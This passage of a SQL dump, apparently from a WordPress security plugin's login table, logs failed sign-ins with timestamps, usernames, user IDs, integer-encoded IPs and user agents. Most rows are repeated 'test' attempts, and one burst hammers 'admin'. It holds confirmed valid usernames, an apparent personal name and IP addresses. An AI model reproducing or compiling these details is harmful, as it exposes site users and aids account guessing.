(98918, 1492305048.821953, 1, 'loginFailInvalidUsername', 'test', 0, 2630993580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98917, 1492304960.854997, 1, 'loginFailValidUsername', 'admin', 1, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98916, 1492303753.312155, 1, 'loginFailInvalidUsername', 'test', 0, 3373670976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98915, 1492303750.654144, 1, 'loginFailInvalidUsername', 'test', 0, 3373670976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98914, 1492302962.925886, 1, 'loginFailInvalidUsername', 'test', 0, 3557016176, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98913, 1492302919.053190, 1, 'loginFailInvalidUsername', 'test', 0, 608990115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98912, 1492299288.297749, 1, 'loginFailValidUsername', 'julie', 2, 2972118172, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98911, 1492298444.941240, 1, 'loginFailInvalidUsername', 'test', 0, 3254738604, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98910, 1492293664.777192, 1, 'loginFailInvalidUsername', 'test', 0, 1834854232, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98909, 1492291822.755137, 1, 'loginFailInvalidUsername', 'test', 0, 1855916338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98908, 1492291821.225611, 1, 'loginFailInvalidUsername', 'test', 0, 1855916338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98907, 1492290916.783731, 1, 'loginFailValidUsername', 'julie', 2, 701685514, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98906, 1492289837.864461, 1, 'loginFailInvalidUsername', 'test', 0, 2982770167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98905, 1492289836.392317, 1, 'loginFailInvalidUsername', 'test', 0, 2982770167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98904, 1492287181.714249, 1, 'loginFailInvalidUsername', 'test', 0, 3220751526, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98903, 1492287180.158312, 1, 'loginFailInvalidUsername', 'test', 0, 3220751526, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98902, 1492283991.514840, 1, 'loginFailInvalidUsername', 'test', 0, 975420267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98901, 1492283990.239210, 1, 'loginFailInvalidUsername', 'test', 0, 1144739235, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98900, 1492283989.929363, 1, 'loginFailInvalidUsername', 'test', 0, 975420267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98899, 1492282328.823146, 1, 'loginFailInvalidUsername', 'test', 0, 1530413649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98898, 1492282327.858183, 1, 'loginFailInvalidUsername', 'test', 0, 1530413649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98897, 1492278332.739840, 1, 'loginFailInvalidUsername', 'test', 0, 1308789018, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98896, 1492278331.694138, 1, 'loginFailInvalidUsername', 'test', 0, 1308789018, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98895, 1492278060.482049, 1, 'loginFailInvalidUsername', 'test', 0, 1566033713, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98894, 1492278059.400073, 1, 'loginFailInvalidUsername', 'test', 0, 1566033713, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98893, 1492276825.240910, 1, 'loginFailValidUsername', 'julie', 2, 3188441888, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98892, 1492276725.871034, 1, 'loginFailInvalidUsername', 'test', 0, 3038501773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98891, 1492276724.320191, 1, 'loginFailInvalidUsername', 'test', 0, 3038501773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98890, 1492274349.257916, 1, 'loginFailInvalidUsername', 'test', 0, 3013559536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98889, 1492274347.899992, 1, 'loginFailInvalidUsername', 'test', 0, 3013559536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98888, 1492273470.881755, 1, 'loginFailInvalidUsername', 'test', 0, 3159534844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98887, 1492273469.828569, 1, 'loginFailInvalidUsername', 'test', 0, 3159534844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98886, 1492272333.757682, 1, 'loginFailInvalidUsername', 'test', 0, 838336850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98885, 1492270168.067552, 1, 'loginFailInvalidUsername', 'test', 0, 693240076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98884, 1492270166.773944, 1, 'loginFailInvalidUsername', 'test', 0, 693240076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98883, 1492268127.760220, 1, 'loginFailInvalidUsername', 'test', 0, 1475493306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98882, 1492268126.505945, 1, 'loginFailInvalidUsername', 'test', 0, 1475493306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98881, 1492265535.356803, 1, 'loginFailValidUsername', 'julie', 2, 2972118060, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98880, 1492265513.620101, 1, 'loginFailInvalidUsername', 'test', 0, 1088380223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98879, 1492265512.479536, 1, 'loginFailInvalidUsername', 'test', 0, 1088380223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98878, 1492260569.526394, 1, 'loginFailInvalidUsername', 'test', 0, 3196614282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98877, 1492260567.974142, 1, 'loginFailInvalidUsername', 'test', 0, 3196614282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98876, 1492258132.026364, 1, 'loginFailInvalidUsername', 'test', 0, 3536047280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98875, 1492257494.202374, 1, 'loginFailInvalidUsername', 'test', 0, 1009997910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98874, 1492257492.676230, 1, 'loginFailInvalidUsername', 'test', 0, 1009997910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98873, 1492257011.159197, 1, 'loginFailValidUsername', 'julie', 2, 1600653116, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98872, 1492254571.061870, 1, 'loginFailInvalidUsername', 'test', 0, 3579648115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98871, 1492254570.084851, 1, 'loginFailInvalidUsername', 'test', 0, 3579648115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98870, 1492250286.088688, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98869, 1492250285.768727, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98868, 1492250285.450959, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98867, 1492250285.126001, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98866, 1492250284.807976, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98865, 1492250284.490596, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98864, 1492250284.038135, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98863, 1492250283.719609, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98862, 1492250283.388906, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98861, 1492250283.068746, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98860, 1492250282.744930, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98859, 1492250282.427928, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98858, 1492250282.098288, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98857, 1492250281.779129, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98856, 1492250281.462600, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98855, 1492250281.132210, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98854, 1492250280.814488, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98853, 1492250280.497488, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98852, 1492250280.160287, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98851, 1492247844.706343, 1, 'loginFailInvalidUsername', 'test', 0, 2995770117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98850, 1492247843.630841, 1, 'loginFailInvalidUsername', 'test', 0, 2995770117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98849, 1492247036.080855, 1, 'loginFailInvalidUsername', 'test', 0, 1394350159, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98848, 1492246715.130247, 1, 'loginFailInvalidUsername', 'test', 0, 1915728785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98847, 1492245875.161983, 1, 'loginFailInvalidUsername', 'test', 0, 1856813194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98846, 1492245873.766201, 1, 'loginFailInvalidUsername', 'test', 0, 1856813194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98845, 1492242029.194710, 1, 'loginFailInvalidUsername', 'test', 0, 1976128136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98844, 1492242027.320010, 1, 'loginFailInvalidUsername', 'test', 0, 1976128136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98843, 1492241584.250370, 1, 'loginFailInvalidUsername', 'test', 0, 632688120, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98842, 1492241582.968622, 1, 'loginFailInvalidUsername', 'test', 0, 632688120, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98841, 1492241073.998662, 1, 'loginFailInvalidUsername', 'test', 0, 850036190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98840, 1492240160.914198, 1, 'loginFailInvalidUsername', 'test', 0, 1010931693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98839, 1492238861.207858, 1, 'loginFailInvalidUsername', 'test', 0, 3564505322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98838, 1492238859.955408, 1, 'loginFailInvalidUsername', 'test', 0, 3564505322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98837, 1492238517.482760, 1, 'loginFailInvalidUsername', 'test', 0, 696802273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98836, 1492238516.164331, 1, 'loginFailInvalidUsername', 'test', 0, 696802273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98835, 1492237927.258805, 1, 'loginFailInvalidUsername', 'test', 0, 1209671474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98834, 1492237922.395152, 1, 'loginFailInvalidUsername', 'test', 0, 1209671474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98833, 1492234737.739405, 1, 'loginFailInvalidUsername', 'test', 0, 1729428867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98832, 1492234735.875219, 1, 'loginFailInvalidUsername', 'test', 0, 1729428867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98831, 1492228391.374464, 1, 'loginFailInvalidUsername', 'test', 0, 3140082908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98830, 1492228390.057935, 1, 'loginFailInvalidUsername', 'test', 0, 3140082908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98829, 1492228156.472600, 1, 'loginFailInvalidUsername', 'test', 0, 1977594621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98828, 1492228154.965751, 1, 'loginFailInvalidUsername', 'test', 0, 1977594621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98827, 1492224983.658856, 1, 'loginFailInvalidUsername', 'test', 0, 2346226121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98826, 1492224981.581134, 1, 'loginFailInvalidUsername', 'test', 0, 2346226121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98825, 1492223966.549924, 1, 'loginFailInvalidUsername', 'test', 0, 1224503857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98824, 1492216040.850791, 1, 'loginFailInvalidUsername', 'test', 0, 3157539414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98823, 1492215627.051438, 1, 'loginFailInvalidUsername', 'test', 0, 692429882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98822, 1492213385.456474, 1, 'loginFailInvalidUsername', 'test', 0, 3288449025, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98821, 1492213382.445135, 1, 'loginFailInvalidUsername', 'test', 0, 3288449025, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98820, 1492212765.519643, 1, 'loginFailInvalidUsername', 'test', 0, 1336437487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98819, 1492211993.109071, 1, 'loginFailInvalidUsername', 'test', 0, 1876519548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98818, 1492211323.325901, 1, 'loginFailInvalidUsername', 'test', 0, 792112870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98817, 1492207329.077796, 1, 'loginFailInvalidUsername', 'test', 0, 2561393884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98816, 1492207327.525904, 1, 'loginFailInvalidUsername', 'test', 0, 2561393884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98815, 1492207229.684242, 1, 'loginFailInvalidUsername', 'test', 0, 1730824995, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98814, 1492207228.441633, 1, 'loginFailInvalidUsername', 'test', 0, 1730824995, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98813, 1492205910.471992, 1, 'loginFailInvalidUsername', 'test', 0, 3202927877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98812, 1492205909.197366, 1, 'loginFailInvalidUsername', 'test', 0, 3202927877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98811, 1492202027.535322, 1, 'loginFailInvalidUsername', 'test', 0, 3375320393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98810, 1492202026.036576, 1, 'loginFailInvalidUsername', 'test', 0, 3375320393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98809, 1492201666.252201, 1, 'loginFailInvalidUsername', 'test', 0, 1295372723, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98808, 1492200267.266750, 1, 'loginFailInvalidUsername', 'test', 0, 1380764866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98807, 1492200216.303752, 1, 'loginFailInvalidUsername', 'test', 0, 843754294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98806, 1492196578.492756, 1, 'loginFailInvalidUsername', 'test', 0, 17393349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98805, 1492196576.892755, 1, 'loginFailInvalidUsername', 'test', 0, 17393349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98804, 1492193103.591561, 1, 'loginFailInvalidUsername', 'test', 0, 3576773627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98803, 1492193102.519859, 1, 'loginFailInvalidUsername', 'test', 0, 3576773627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98802, 1492191768.971430, 1, 'loginFailInvalidUsername', 'test', 0, 2001500915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98801, 1492191766.797997, 1, 'loginFailInvalidUsername', 'test', 0, 2001500915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98800, 1492189307.137756, 1, 'loginFailInvalidUsername', 'test', 0, 831866499, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98799, 1492189305.365727, 1, 'loginFailInvalidUsername', 'test', 0, 831866499, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98798, 1492189288.288678, 1, 'loginFailInvalidUsername', 'test', 0, 1976279672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98797, 1492189286.504656, 1, 'loginFailInvalidUsername', 'test', 0, 1976279672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98796, 1492185839.281331, 1, 'loginFailInvalidUsername', 'test', 0, 1781731329, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98795, 1492181889.798329, 1, 'loginFailInvalidUsername', 'test', 0, 2006575746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98794, 1492181888.476784, 1, 'loginFailInvalidUsername', 'test', 0, 2006575746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98793, 1492180363.396289, 1, 'loginFailInvalidUsername', 'test', 0, 1333705792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98792, 1492170952.315249, 1, 'loginFailInvalidUsername', 'test', 0, 2030499101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98791, 1492170950.669060, 1, 'loginFailInvalidUsername', 'test', 0, 2030499101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98790, 1492170565.990585, 1, 'loginFailInvalidUsername', 'test', 0, 2057623110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98789, 1492170564.631821, 1, 'loginFailInvalidUsername', 'test', 0, 2057623110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98788, 1492167562.659095, 1, 'loginFailValidUsername', 'admin', 1, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98787, 1492167561.961929, 1, 'loginFailValidUsername', 'pablo', 3, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98786, 1492167561.306965, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98785, 1492167560.664184, 1, 'loginFailValidUsername', 'julie', 2, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98784, 1492167560.009072, 1, 'loginFailValidUsername', 'julie', 2, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98783, 1492167415.489189, 1, 'loginFailInvalidUsername', 'test', 0, 1039602305, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98782, 1492167413.997964, 1, 'loginFailInvalidUsername', 'test', 0, 1039602305, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98781, 1492164582.532646, 1, 'loginFailInvalidUsername', 'test', 0, 1312794843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98780, 1492160412.874154, 1, 'loginFailInvalidUsername', 'test', 0, 783306918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98779, 1492160411.787543, 1, 'loginFailInvalidUsername', 'test', 0, 783306918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98778, 1492155817.705691, 1, 'loginFailInvalidUsername', 'test', 0, 1564920793, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98777, 1492155816.554519, 1, 'loginFailInvalidUsername', 'test', 0, 1564920793, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98776, 1492148268.001029, 1, 'loginFailInvalidUsername', 'test', 0, 3184961325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98775, 1492148266.664299, 1, 'loginFailInvalidUsername', 'test', 0, 3184961325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98774, 1492145540.153014, 1, 'loginFailInvalidUsername', 'test', 0, 698235021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98773, 1492145538.833866, 1, 'loginFailInvalidUsername', 'test', 0, 698235021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98772, 1492144971.355227, 1, 'loginFailInvalidUsername', 'test', 0, 1430929736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98771, 1492144970.304125, 1, 'loginFailInvalidUsername', 'test', 0, 1430929736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(98770, 1492144915.910124, 1, 'loginFailInvalidUsername', 'test', 0, 3393065050, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98769, 1492134517.093906, 1, 'loginFailInvalidUsername', 'test', 0, 3153760673, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98768, 1492132585.288795, 1, 'loginFailInvalidUsername', 'test', 0, 3171175055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
